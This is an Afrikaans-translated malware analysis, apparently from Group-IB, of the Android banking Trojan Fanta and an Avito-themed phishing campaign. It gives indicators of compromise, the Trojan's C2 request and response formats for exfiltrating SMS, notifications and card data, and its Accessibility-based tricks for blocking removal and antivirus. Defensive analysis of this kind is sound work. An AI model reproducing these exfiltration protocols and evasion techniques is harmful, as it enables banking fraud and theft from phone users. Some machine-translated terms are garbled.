Eendag wil jy iets op Avito verkoop en nadat jy 'n gedetailleerde beskrywing van jou produk geplaas het (byvoorbeeld 'n RAM-module), sal jy hierdie boodskap ontvang:
Sodra jy die skakel oopgemaak het, sal jy 'n oënskynlik onskadelike bladsy sien wat jou, die gelukkige en suksesvolle verkoper, in kennis stel dat 'n aankoop gedoen is:
Sodra jy op die "Gaan voort"-knoppie klik, sal 'n APK-lêer met 'n ikoon en 'n vertroue-inspirerende naam na jou Android-toestel afgelaai word. Jy het 'n toepassing geïnstalleer wat om een of ander rede AccessibilityService-regte aangevra het, toe verskyn 'n paar vensters en verdwyn vinnig en ... Dis dit.
Jy gaan kyk na jou saldo, maar om een of ander rede vra jou banktoepassing weer jou kaartbesonderhede. Nadat u die data ingevoer het, gebeur iets verskrikliks: om een of ander rede wat vir u nog onduidelik is, begin geld uit u rekening verdwyn. Jy probeer die probleem oplos, maar jou foon weerstaan: dit druk die "Terug" en "Tuis" sleutels, skakel nie af nie en laat jou nie toe om enige sekuriteitsmaatreëls te aktiveer nie. Gevolglik sit jy sonder geld, jou goedere is nie gekoop nie, jy is verward en wonder: wat het gebeur?
Die antwoord is eenvoudig: jy het 'n slagoffer geword van die Android Trojan Fanta, 'n lid van die Flexnet-familie. Hoe het dit gebeur? Kom ons verduidelik nou.
Skrywers: Andrey Polovinkin, junior spesialis in wanware-analise, Ivan Pisarev, spesialis in wanware-analise.
Sommige statistieke
Die Flexnet-familie van Android-trojane het die eerste keer in 2015 bekend geword. Oor 'n redelike lang tydperk van aktiwiteit het die familie uitgebrei na verskeie subspesies: Fanta, Limebot, Lipton, ens. Die Trojaan, sowel as die infrastruktuur wat daarmee geassosieer word, staan nie stil nie: nuwe effektiewe verspreidingskemas word ontwikkel - in ons geval, hoë-gehalte uitvissingbladsye wat op 'n spesifieke gebruiker-verkoper gemik is, en die Trojaanse ontwikkelaars volg modieuse neigings in virusskryf - die toevoeging van nuwe funksionaliteit wat dit moontlik maak om meer doeltreffend geld van besmette toestelle te steel en beskermingsmeganismes te omseil.
Die veldtog wat in hierdie artikel beskryf word, is gemik op gebruikers van Rusland; 'n klein aantal besmette toestelle is in die Oekraïne aangeteken, en selfs minder in Kazakstan en Wit-Rusland.
Selfs al is Flexnet al meer as 4 jaar in die Android Trojaanse arena en is dit in detail deur baie navorsers bestudeer, is dit steeds in goeie toestand. Vanaf Januarie 2019 is die potensiële bedrag van skade meer as 35 miljoen roebels - en dit is slegs vir veldtogte in Rusland. In 2015 is verskeie weergawes van hierdie Android Trojaan op ondergrondse forums verkoop, waar die bronkode van die Trojaan met 'n gedetailleerde beskrywing ook gevind kon word. Dit beteken dat die statistieke van skade in die wêreld selfs meer indrukwekkend is. Nie 'n slegte aanwyser vir so 'n ou man nie, of hoe?
Van uitverkoping tot misleiding
Soos gesien kan word uit die voorheen aangebied skermskoot van 'n uitvissing-bladsy vir die internetdiens vir die plasing van advertensies Avito, is dit voorberei vir 'n spesifieke slagoffer. Blykbaar gebruik die aanvallers een van Avito se ontleders, wat die telefoonnommer en naam van die verkoper uittrek, sowel as die produkbeskrywing. Nadat die bladsy uitgebrei is en die APK-lêer voorberei is, word die slagoffer 'n SMS gestuur met sy naam en 'n skakel na 'n phishing-bladsy wat 'n beskrywing van sy produk en die bedrag wat uit die "verkope" van die produk ontvang is, bevat. Deur op die knoppie te klik, ontvang die gebruiker 'n kwaadwillige APK-lêer - Fanta.
'n Studie van die shcet491[.]ru-domein het getoon dat dit aan Hostinger se DNS-bedieners gedelegeer is:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Die domeinsonelêer bevat inskrywings wat na die IP-adresse 31.220.23[.]236, 31.220.23[.]243 en 31.220.23[.]235 wys. Die domein se primêre hulpbronrekord (A-rekord) wys egter na 'n bediener met IP-adres 178.132.1[.]240.
IP-adres 178.132.1[.]240 is in Nederland geleë en behoort aan die gasheer Wêreldstroom. IP-adresse 31.220.23[.]235, 31.220.23[.]236 en 31.220.23[.]243 is in die Verenigde Koninkryk geleë en behoort aan die gedeelde gasheerbediener HOSTINGER. Word gebruik as 'n blokfluit openprov-ru. Die volgende domeine is ook opgelos na die IP-adres 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Daar moet kennis geneem word dat skakels in die volgende formaat beskikbaar was vanaf byna alle domeine:
http://(www.){0,1}<%domain%>/[0-9]{7}
Hierdie sjabloon sluit ook 'n skakel van 'n SMS-boodskap in. Gebaseer op historiese data, is gevind dat een domein ooreenstem met verskeie skakels in die patroon hierbo beskryf, wat aandui dat een domein gebruik is om die Trojaan na verskeie slagoffers te versprei.
Kom ons spring 'n bietjie vooruit: die Trojaan wat via 'n skakel vanaf 'n SMS afgelaai word, gebruik die adres as 'n beheerbediener onusedseddohap[.]klub. Hierdie domein is op 2019-03-12 geregistreer, en vanaf 2019-04-29 het APK-toepassings met hierdie domein in wisselwerking gegaan. Gegrond op data verkry vanaf VirusTotal, het altesaam 109 toepassings met hierdie bediener in wisselwerking gegaan. Die domein self het na die IP-adres opgelos 217.23.14[.]27, geleë in Nederland en in besit van die gasheer Wêreldstroom. Word gebruik as 'n blokfluit naam goedkoop. Domeine is ook na hierdie IP-adres opgelos bad-racoon[.]klub (vanaf 2018-09-25) en bad-racoon[.]live (begin vanaf 2018-10-25). Met domein bad-racoon[.]klub met meer as 80 APK-lêers interaksie gehad bad-racoon[.]live - meer as 100.
Oor die algemeen vorder die aanval soos volg:
Wat is onder Fanta se deksel?
Soos baie ander Android-trojane, is Fanta in staat om SMS-boodskappe te lees en te stuur, USSD-versoeke te rig en sy eie vensters bo-op toepassings (insluitend bankdienste) te vertoon. Die arsenaal van funksionaliteit van hierdie gesin het egter aangebreek: Fanta het begin gebruik Toeganklikheiddiens vir verskeie doeleindes: lees van die inhoud van kennisgewings van ander toepassings, voorkoming van opsporing en stop die uitvoering van 'n Trojaan op 'n besmette toestel, ens. Fanta werk op alle weergawes van Android nie jonger as 4.4 nie. In hierdie artikel sal ons die volgende Fanta-voorbeeld van nader bekyk:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Onmiddellik na bekendstelling
Onmiddellik na die bekendstelling versteek die Trojaan sy ikoon. Die toepassing kan slegs werk as die naam van die besmette toestel nie in die lys is nie:
- android_x86
- VirtualBox
- Nexus 5X (bulkop)
- Nexus 5 (skeermes)
Hierdie tjek word uitgevoer in die hoofdiens van die Trojan - Hoofdiens. Wanneer dit vir die eerste keer bekendgestel word, word die toepassing se konfigurasieparameters geïnisialiseer na verstekwaardes (die formaat vir die stoor van konfigurasiedata en hul betekenis sal later bespreek word), en 'n nuwe besmette toestel word op die beheerbediener geregistreer. 'n HTTP POST-versoek met die boodskaptipe sal na die bediener gestuur word registreer_bot en inligting oor die besmette toestel (Android-weergawe, IMEI, telefoonnommer, operateurnaam en landkode waarin die operateur geregistreer is). Die adres dien as die beheerbediener hXXp://onuseseddohap[.]club/controller.php. In reaksie hierop stuur die bediener 'n boodskap wat die velde bevat bot_id, bot_pwd, bediener - die toepassing stoor hierdie waardes as parameters van die CnC-bediener. Parameter bediener opsioneel as die veld nie ontvang is nie: Fanta gebruik die registrasieadres - hXXp://onuseseddohap[.]club/controller.php. Die funksie om die CnC-adres te verander kan gebruik word om twee probleme op te los: om die las eweredig tussen verskeie bedieners te versprei (as daar 'n groot aantal besmette toestelle is, kan die las op 'n ongeoptimaliseerde webbediener hoog wees), en ook om te gebruik 'n alternatiewe bediener in die geval van 'n mislukking van een van die CnC-bedieners.
As 'n fout voorkom tydens die stuur van die versoek, sal die Trojaan die registrasieproses na 20 sekondes herhaal.
Sodra die toestel suksesvol geregistreer is, sal Fanta die volgende boodskap aan die gebruiker vertoon:
Belangrike nota: die diens geroep Stelselsekuriteit - die naam van die Trojaanse diens, en nadat u op die knoppie geklik het OK 'n Venster sal oopmaak met die Toeganklikheidsinstellings van die besmette toestel, waar die gebruiker Toeganklikheidsregte vir die kwaadwillige diens moet gee:
Sodra die gebruiker aanskakel Toeganklikheiddiens, Fanta kry toegang tot die inhoud van toepassingsvensters en die aksies wat daarin uitgevoer word:
Onmiddellik nadat hy Toeganklikheidsregte ontvang het, versoek die Trojaan administrateurregte en regte om kennisgewings te lees:
Deur die Toeganklikheiddiens te gebruik, simuleer die toepassing toetsaanslagen en gee sodoende aan homself al die nodige regte.
Fanta skep verskeie databasisgevalle (wat later beskryf sal word) wat nodig is om konfigurasiedata te stoor, sowel as inligting wat in die proses oor die besmette toestel ingesamel is. Om die versamelde inligting te stuur, skep die Trojaan 'n herhalende taak wat ontwerp is om velde van die databasis af te laai en 'n opdrag van die beheerbediener te ontvang. Die interval vir toegang tot CnC word gestel na gelang van die Android-weergawe: in die geval van 5.1 sal die interval 10 sekondes wees, andersins 60 sekondes.
Om die opdrag te ontvang, rig Fanta 'n versoek Kry Taak na die bestuursbediener. In reaksie kan CnC een van die volgende opdragte stuur:
| Span | Beskrywing |
|---|---|
| 0 | Stuur SMS-boodskap |
| 1 | Maak 'n telefoonoproep of USSD-opdrag |
| 2 | Dateer 'n parameter op interval |
| 3 | Dateer 'n parameter op onderskep |
| 6 | Dateer 'n parameter op smsbestuurder |
| 9 | Begin SMS-boodskappe versamel |
| 11 | Stel jou foon terug na fabrieksinstellings |
| 12 | Aktiveer/deaktiveer aanteken van dialoogkasskepping |
Fanta samel ook kennisgewings van 70 banktoepassings, vinnige betalingstelsels en e-beursies in en stoor dit in 'n databasis.
Stoor konfigurasieparameters
Om konfigurasieparameters te stoor, gebruik Fanta 'n standaardbenadering vir die Android-platform - Voorkeure-lêers. Die instellings sal gestoor word in 'n lêer met die naam instellings. 'n Beskrywing van die gestoorde parameters is in die tabel hieronder.
| naam | Standaard waarde | Moontlike waardes | Beskrywing |
|---|---|---|---|
| id | 0 | Integer | Bot ID |
| bediener | hXXp://onuseseddohap[.]club/ | URL | Beheer bediener adres |
| PWD | - | string | Bediener wagwoord |
| interval | 20 | Integer | Tydsinteval. Dui aan hoe lank die volgende take uitgestel moet word:
|
| onderskep | almal | almal/telnommer | As die veld gelyk is aan die string almal of telnommer, dan sal die ontvangde SMS-boodskap deur die toepassing onderskep word en nie aan die gebruiker gewys word nie |
| smsbestuurder | 0 | 0/1 | Aktiveer/deaktiveer die toepassing as die verstek SMS-ontvanger |
| lees Dialoog | valse | Waar vals | Aktiveer/deaktiveer gebeurtenislogboek Toeganklikheidgeleentheid |
Fanta gebruik ook die lêer smsbestuurder:
| naam | Standaard waarde | Moontlike waardes | Beskrywing |
|---|---|---|---|
| pckg | - | string | Naam van SMS-boodskapbestuurder wat gebruik is |
Interaksie met databasisse
Tydens sy werking gebruik die Trojaan twee databasisse. Databasis genoem a gebruik om verskeie inligting wat vanaf die foon versamel is, te stoor. Die tweede databasis word genoem fanta.db en word gebruik om instellings te stoor wat verantwoordelik is vir die skep van uitvissingsvensters wat ontwerp is om inligting oor bankkaarte in te samel.
Trojan gebruik databasis а om versamelde inligting te stoor en jou handelinge aan te teken. Data word in 'n tabel gestoor logs. Om 'n tabel te skep, gebruik die volgende SQL-navraag:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Die databasis bevat die volgende inligting:
1. Teken die opstart van die besmette toestel met 'n boodskap aan Die foon is aangeskakel!
2. Kennisgewings van toepassings. Die boodskap word gegenereer volgens die volgende sjabloon:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkaartdata van uitvissingvorms wat deur die Trojaan geskep is. Parameter VIEW_NAME kan een van die volgende wees:
- AliExpress
- Avito
- Google Play
- Diverse <%App Naam%>
Die boodskap word in die formaat aangeteken:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Inkomende/uitgaande SMS-boodskappe in die formaat:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Inligting oor die pakket wat die dialoogkassie in die formaat skep:
(<%Package name%>)<%Package information%>
Voorbeeld tabel logs:
Een van die funksies van Fanta is die versameling van inligting oor bankkaarte. Data-insameling vind plaas deur die skep van uitvissingsvensters wanneer banktoepassings oopgemaak word. Die Trojaan skep die uitvissing-venster slegs een keer. Inligting dat die venster aan die gebruiker gewys is, word in 'n tabel gestoor instellings in die databasis fanta.db. Om 'n databasis te skep, gebruik die volgende SQL-navraag:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Alle tabelvelde instellings by verstek geïnisialiseer na 1 (skep 'n uitvissingsvenster). Nadat die gebruiker hul data ingevoer het, sal die waarde op 0 gestel word. Voorbeeld van tabelvelde instellings:
- kan_inteken — die veld is verantwoordelik vir die vertoon van die vorm wanneer 'n bankaansoek oopgemaak word
- eerste_bank - nie gebruik nie
- kan_avito — die veld is verantwoordelik vir die vertoon van die vorm wanneer die Avito-toepassing oopgemaak word
- kan_ali - die veld is verantwoordelik vir die vertoon van die vorm wanneer die Aliexpress-toepassing oopgemaak word
- kan_ander — die veld is verantwoordelik vir die vertoon van die vorm wanneer enige aansoek vanaf die lys oopgemaak word: Yula, Pandao, Drom Auto, Wallet. Afslag- en bonuskaarte, Aviasales, Bespreking, Trivago
- kan_kaart — die veld is verantwoordelik vir die vertoon van die vorm wanneer dit oopgemaak word Google Play
Interaksie met die bestuursbediener
Netwerkinteraksie met die bestuurbediener vind plaas via die HTTP-protokol. Om met die netwerk te werk, gebruik Fanta die gewilde Retrofit-biblioteek. Versoeke word gestuur aan: hXXp://onuseseddohap[.]club/controller.php. Die bedieneradres kan verander word wanneer jy op die bediener registreer. Koekies kan in reaksie vanaf die bediener gestuur word. Fanta rig die volgende versoeke aan die bediener:
- Registrasie van die bot op die beheerbediener vind een keer plaas, met die eerste bekendstelling. Die volgende data oor die besmette toestel word na die bediener gestuur:
· Koekie - koekies ontvang vanaf die bediener (verstekwaarde is 'n leë string)
· af - snaar konstante registreer_bot
· voorvoegsel — heelgetal konstante 2
· weergawe_sdk — word volgens die volgende sjabloon gevorm: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI van die besmette toestel
· land — kode van die land waarin die operateur geregistreer is, in ISO-formaat
· aantal - telefoon nommer
· operateur — naam van die operateur'n Voorbeeld van 'n versoek wat na die bediener gestuur is:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>In reaksie op die versoek moet die bediener 'n JSON-voorwerp terugstuur wat die volgende parameters bevat:
· bot_id - ID van die besmette toestel. As bot_id gelyk is aan 0, sal Fanta die versoek weer uitvoer.
bot_pwd - wagwoord vir die bediener.
bediener - beheer bediener adres. Opsionele parameter. As die parameter nie gespesifiseer is nie, sal die adres wat in die toepassing gestoor is, gebruik word.Voorbeeld JSON voorwerp:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Versoek om 'n opdrag vanaf die bediener te ontvang. Die volgende data word na die bediener gestuur:
· Koekie - koekies ontvang vanaf die bediener
· bod - ID van die besmette toestel wat ontvang is toe die versoek gestuur is registreer_bot
· PWD -wagwoord vir die bediener
· divice_admin — die veld bepaal of administrateurregte verkry is. As administrateur regte verkry is, is die veld gelyk aan 1andersins 0
· Toeganklikheid — Toeganklikheiddiensbedryfstatus. As die diens begin is, is die waarde 1andersins 0
· SMS Bestuurder — wys of die Trojaan geaktiveer is as die verstektoepassing vir die ontvangs van SMS
· skerm - vertoon die toestand van die skerm. Die waarde sal gestel word 1, as die skerm aan is, anders 0;'n Voorbeeld van 'n versoek wat na die bediener gestuur is:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Afhangende van die opdrag, kan die bediener 'n JSON-voorwerp met verskillende parameters terugstuur:
· Span Stuur SMS-boodskap: Die parameters bevat die telefoonnommer, die teks van die SMS-boodskap en die ID van die boodskap wat gestuur word. Die identifiseerder word gebruik wanneer 'n boodskap met tipe na die bediener gestuur word stelSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Span Maak 'n telefoonoproep of USSD-opdrag: Die telefoonnommer of opdrag kom in die antwoordliggaam.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Span Verander intervalparameter.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Span Verander afsnitparameter.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Span Verander SmsManager-veld.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Span Versamel SMS-boodskappe vanaf 'n besmette toestel.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Span Stel jou foon terug na fabrieksinstellings:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Span Verander ReadDialog parameter.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Stuur 'n boodskap met tipe stelSmsStatus. Hierdie versoek word gemaak nadat die opdrag uitgevoer is Stuur SMS-boodskap. Die versoek lyk soos volg:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Laai databasisinhoud op. Een ry word per versoek versend. Die volgende data word na die bediener gestuur:
· Koekie - koekies ontvang vanaf die bediener
· af - snaar konstante stelSaveInboxSms
· bod - ID van die besmette toestel wat ontvang is toe die versoek gestuur is registreer_bot
· teks - teks in die huidige databasisrekord (veld d van die tafel af logs in die databasis а)
· aantal - naam van die huidige databasisrekord (veld p van die tafel af logs in die databasis а)
· sms_modus — heelgetalwaarde (veld m van die tafel af logs in die databasis а)Die versoek lyk soos volg:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>As dit suksesvol na die bediener gestuur word, sal die ry van die tabel verwyder word. Voorbeeld van 'n JSON-objek wat deur die bediener teruggestuur word:
{ "response":[], "status":"ok" }
Interaksie met AccessibilityService
AccessibilityService is geïmplementeer om Android-toestelle makliker te maak om te gebruik vir mense met gestremdhede. In die meeste gevalle is fisiese interaksie nodig om met 'n toepassing te kommunikeer. AccessibilityService laat jou toe om dit programmaties te doen. Fanta gebruik die diens om vals vensters in banktoepassings te skep en te verhoed dat gebruikers stelselinstellings en sommige toepassings oopmaak.
Deur die funksionaliteit van die AccessibilityService te gebruik, monitor die Trojaan veranderinge aan elemente op die skerm van die besmette toestel. Soos voorheen beskryf, bevat die Fanta-instellings 'n parameter wat verantwoordelik is vir logbewerkings met dialoogkassies - lees Dialoog. As hierdie parameter gestel is, sal inligting oor die naam en beskrywing van die pakket wat die gebeurtenis veroorsaak het, by die databasis gevoeg word. Die Trojaan voer die volgende aksies uit wanneer gebeurtenisse geaktiveer word:
- Simuleer die druk van die terug- en tuissleutels in die volgende gevalle:
· as die gebruiker sy toestel wil herlaai
· as die gebruiker die "Avito"-toepassing wil uitvee of toegangsregte wil verander
· as daar 'n melding van die "Avito"-toepassing op die bladsy is
· wanneer die Google Play Beskerming-toepassing oopgemaak word
· wanneer bladsye met AccessibilityService-instellings oopgemaak word
· wanneer die dialoogkassie Stelselsekuriteit verskyn
· wanneer die bladsy oopgemaak word met die "Teken oor ander toepassing"-instellings
· wanneer die "Toepassings"-bladsy oopgemaak word, "Herstel en terugstel", "Data-terugstelling", "Stel instellings terug", "Ontwikkelaarpaneel", "Spesiaal. geleenthede", "Spesiale geleenthede", "Spesiale regte"
· as die gebeurtenis deur sekere toepassings gegenereer is.Aansoeklys
- Android
- Meester Lite
- skoon Meester
- Clean Master vir x86 CPU
- Meizu-aansoektoestemmingsbestuur
- MIUI Sekuriteit
- Clean Master - Antivirus & Cache and Garbage Cleaner
- Ouerkontroles en GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virusskoonmaker, Antivirus, Skoonmaker (MAX Sekuriteit)
- Mobile AntiVirus Security PRO
- Avast antivirus en gratis beskerming 2019
- Mobiele sekuriteit MegaFon
- AVG-beskerming vir Xperia
- Mobiele sekuriteit
- Malwarebytes antivirus en beskerming
- Antivirus vir Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus vir Huawei tablet Stelselbestuurder
- Samsung Toeganklikheid
- Samsung Slim Bestuurder
- Sekuriteitsmeester
- Spoedversterker
- dr.web
- Dr.Web-sekuriteitsruimte
- Dr.Web Mobiele Beheersentrum
- Dr.Web Security Space Life
- Dr.Web Mobiele Beheersentrum
- Antivirus- en mobiele beveiliging
- Kaspersky Internet Security: Antivirus en beskerming
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - beskerming en bestuur
- AVG Antivirus gratis 2019 – Beskerming vir Android
- Antivirus Android
- Norton Mobile Security en Antivirus
- Antivirus, firewall, VPN, mobiele sekuriteit
- Mobiele sekuriteit: antivirus, VPN, diefstalbeskerming
- Antivirus vir Android
- As toestemming gevra word wanneer 'n SMS-boodskap na 'n kort nommer gestuur word, simuleer Fanta om op die merkblokkie te klik Onthou keuse en knoppie te stuur.
- Wanneer jy probeer om administrateurregte van die Trojaan af te neem, sluit dit die foonskerm.
- Verhoed dat nuwe administrateurs bygevoeg word.
- As die antivirus-toepassing dr.web 'n bedreiging bespeur, Fanta boots die druk van die knoppie na ignoreer.
- Die Trojaan simuleer die druk op die terug- en tuisknoppie as die gebeurtenis deur die toepassing gegenereer is Samsung Device Care.
- Fanta skep phishing-vensters met vorms om inligting oor bankkaarte in te voer as 'n toepassing uit 'n lys van ongeveer 30 verskillende internetdienste geloods is. Onder hulle: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ens.
Uitvissingvorms
Fanta ontleed watter toepassings op die besmette toestel loop. As 'n aansoek van belangstelling oopgemaak is, vertoon die Trojaan 'n uitvissing-venster bo-op al die ander, wat 'n vorm is om bankkaartinligting in te voer. Die gebruiker moet die volgende data invoer:
- Kaart nommer
- Kaart vervaldatum
- CVV
- Kaarthouer se naam (nie vir alle banke nie)
Afhangende van die toepassing wat loop, sal verskillende uitvissingsvensters gewys word. Hieronder is voorbeelde van sommige van hulle:
AliExpress:
Avito:
Vir sommige ander toepassings, bv. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Hoe dit regtig was
Gelukkig het die persoon wat die SMS-boodskap ontvang het wat aan die begin van die artikel beskryf is, 'n kuberveiligheidspesialis geblyk te wees. Daarom verskil die regte, nie-regisseur se weergawe van die een wat vroeër vertel is: 'n persoon het 'n interessante SMS ontvang, waarna hy dit aan die Group-IB Threat Hunting Intelligence-span gegee het. Die resultaat van die aanval is hierdie artikel. Gelukkige einde, reg? Nie alle stories eindig egter so suksesvol nie, en sodat joune nie soos 'n regisseurssnit lyk met 'n verlies aan geld nie, is dit in die meeste gevalle genoeg om by die volgende lank beskryfde reëls te hou:
- moenie toepassings vir 'n mobiele toestel met Android OS vanaf enige ander bronne as Google Play installeer nie
- Wanneer u 'n toepassing installeer, let veral op die regte wat deur die toepassing versoek word
- let op die uitbreidings van afgelaaide lêers
- installeer Android OS-opdaterings gereeld
- moenie verdagte bronne besoek nie en moenie lêers daarvandaan aflaai nie
- Moenie op skakels klik wat in SMS-boodskappe ontvang word nie.
Bron: will.com